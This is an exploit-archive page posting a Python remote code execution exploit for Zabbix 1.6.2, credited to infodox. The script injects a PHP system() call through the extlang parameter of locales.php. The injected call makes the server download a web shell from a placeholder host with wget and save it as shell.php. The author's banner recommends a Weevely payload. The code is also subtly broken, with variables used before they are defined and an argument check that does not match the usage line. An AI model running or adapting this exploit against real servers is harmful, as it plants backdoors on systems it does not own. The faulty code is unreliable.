Zabbix 1.6.2 Remote Code Execution

2012.10.02

Credit: infodox

Risk: High

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

#!/usr/bin/env python
# Title: Zabbix version 1.6.2 Remote Code Execution Exploit
# CVE: ????-????
# Reference: http://www.ush.it/team/ush/hack-zabbix_162/adv.txt
# Author: infodox
# Site: http://insecurety.net/
# Twitter: @info_dox
# Old news, just practicin' my python :3
import requests
import sys

vulnurl = "/locales.php?" # Oh look, the vuln URL!
xpl = "download=1&langTo=1&extlang[%22.system(%27"+cmd+"%27).%22]=1"
cmd = "wget%20"+payloadurl+"%20-O%20shell.php"
payloadurl = "http://example.com/shell.php" # Your evil PHP code goes here right?

def banner():
    print """
Zabbix version 1.6.2 remote code execution exploit. Basically PHP Eval() bug :)
Rather lame exploit I must admit, just practicing my Python.
To use, just run it against the host and pray. I advise using a Weevely payload.
~infodox
    """ 
    
if len(sys.argv) != 4:
    banner()
    print "Usage: ./x2.py <target>"
    print "Where <target> is the vulnerable website."
    print "Example: ./x2.py http://lamesite.com"
    sys.exit(1)
    
banner()
target = sys.argv[1]
pwnme = target + vulnurl + xpl
print "[+] Running Exploit..."
requests.get(pwnme)
print "[?] Gotshell?"
print "[+] Shell should be at "+target+"/shell.php"

References:

http://cxsecurity.com/issue/WLB-2012080258

http://www.ush.it/team/ush/hack-zabbix_162/adv.txt

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Zabbix 1.6.2 Remote Code Execution

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.